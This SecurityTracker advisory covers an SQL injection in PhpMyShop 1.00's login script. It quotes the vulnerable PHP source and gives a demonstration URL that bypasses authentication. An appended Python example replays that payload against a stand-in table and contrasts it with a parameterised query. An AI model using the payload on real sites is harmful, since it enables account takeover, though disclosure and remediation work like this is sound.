SecurityTracker.com
SecurityTracker
Archives

Category:   Application (Commerce)  >   PhpMyShop
Vendors:   Desaunay, Julien
PhpMyShop SQL Injection Flaw Allows Remote Users to Gain Access to the System
SecurityTracker Alert ID:  1006030
SecurityTracker URL:  http://securitytracker.com/id/1006030
CVE Reference:   CVE-2003-1532   (Links to External Site)
Updated:  Jun 24 2008
Original Entry Date:  Feb 3 2003
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 1.00
Description:   A vulnerability was reported in PhpMyShop. A remote user can log in as another user on the system.

Frog-m@n reported that the 'compte.php' script does not properly filter user-supplied input before using it in an SQL query. A remote user can supply a URL with specially crafted values for the '$identifiant' and '$password' variables and be authenticated by the system. A single quote in either value terminates the string literal in the authentication query, so the rest of the value is interpreted as SQL; the injected condition causes the WHERE clause that determines authentication success to be incorrectly evaluated as 'TRUE', and the script treats any non-zero row count as a successful login. The '$identifiant' value will determine which user account is accessed.

A demonstration exploit URL is provided:

http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='

Impact:   A remote user can gain access to user accounts on the system.
Solution:   No vendor solution was available at the time of this entry. The author of the report has released an unofficial patch, available at:

http://www.phpsecure.info/

Vendor URL:  www.pc-encheres.com/ (Links to External Site)
Cause:   Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] phpMyShop (php)




Information:
Version: 1.00
Website: http://www.pc-encheres.com
Problem: SQL Injection


PHP Code/Location:
compte.php:
---------------------------------------------------------------
<?
session_start();

if (isset($achat))
{
session_register("achat");
}
else
{
header("location:index.php");
}

include("design/header.php");
require("config.php");
require("fonction.php");

echo"<td bgcolor=\"$barre1\"><font color=\"$police3\" 
size=\"$width_police2\"><strong>Identification</strong></font></td>
  </tr>
  <tr>
    <td><br>";

if (isset($valider))
{
// $identifiant and $password arrive straight from the request (register_globals)
// and are interpolated unescaped into the query text: this is the injection point.
$sql = "SELECT id_cli,login_cli,pass_cli FROM $table_client where login_cli='$identifiant' and pass_cli='$password'";
$sql = mysql_db_query($base,$sql);
$test = mysql_num_rows($sql);
// Any non-zero row count is treated as a successful login.
if ($test=="0")
{
?>
<script language="javascript">
alert("Identifiant ou mot de passe non valide!");
</script>
<?
echo"<center><strong>Identifiant ou mot de passe non valide!</strong></center><br>";
}
else
{
// The first row returned becomes the logged-in account.
$id_membre = mysql_result($sql,0,"id_cli");
session_register("id_membre");
?>
<script language="javascript">
document.location.href="valide.php"
</script>
<?
}
}

[...]
---------------------------------------------------------------



Exploit:
http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='


Solution:
A patch has been published on http://www.phpsecure.info.



More details:
In French:
http://www.frog-man.org/tutos/phpmyshop.txt
Translated by Google:
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2Fphpmyshop.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools



frog-m@n
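
The authentication bypass described in the advisory and visible in the compte.php listing above, as an added example that is not part of the original post or of PhpMyShop: it URL-decodes the published exploit query string, replays the decoded values against a constructed SQLite stand-in for the client table using a query built the same way compte.php builds it, and then runs the same check with bound parameters, which is the standard remediation. The table name `client` and its rows are assumptions.

```python
import sqlite3
from urllib.parse import parse_qs

# Query string of the advisory's demonstration URL, exactly as published.
EXPLOIT_QUERY = "achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='"

def exploit_values():
    """URL-decode the two request parameters that compte.php interpolates."""
    params = parse_qs(EXPLOIT_QUERY)
    return params["identifiant"][0], params["password"][0]

def make_db():
    """Constructed stand-in for PhpMyShop's client table (rows are made up)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE client (id_cli INTEGER PRIMARY KEY, login_cli TEXT, pass_cli TEXT)")
    db.executemany("INSERT INTO client VALUES (?, ?, ?)",
                   [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return db

def login_vulnerable(db, identifiant, password):
    """Mirrors compte.php: request values are spliced into the SQL text, so a
    quote in either value ends the literal and the remainder becomes SQL."""
    sql = ("SELECT id_cli,login_cli,pass_cli FROM client where "
           f"login_cli='{identifiant}' and pass_cli='{password}'")
    rows = db.execute(sql).fetchall()
    # compte.php treats any non-zero row count as success and uses row 0,
    # so an always-true WHERE clause logs the caller in as the first account.
    return rows[0][0] if rows else None

def login_fixed(db, identifiant, password):
    """Same check with bound parameters: the values are data, never SQL."""
    sql = "SELECT id_cli FROM client WHERE login_cli=? AND pass_cli=?"
    row = db.execute(sql, (identifiant, password)).fetchone()
    return row[0] if row else None

def compare(identifiant, password):
    """Run one credential pair through both versions on a fresh table."""
    db = make_db()
    return login_vulnerable(db, identifiant, password), login_fixed(db, identifiant, password)

if __name__ == "__main__":
    ident, pw = exploit_values()
    print("decoded payload:", repr(ident))          # "' OR ''='"
    print("exploit  ->", compare(ident, pw))        # (1, None)
    print("valid    ->", compare("bob", "hunter2"))  # (2, 2)
```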






Copyright 2020, SecurityGlobal.net LLC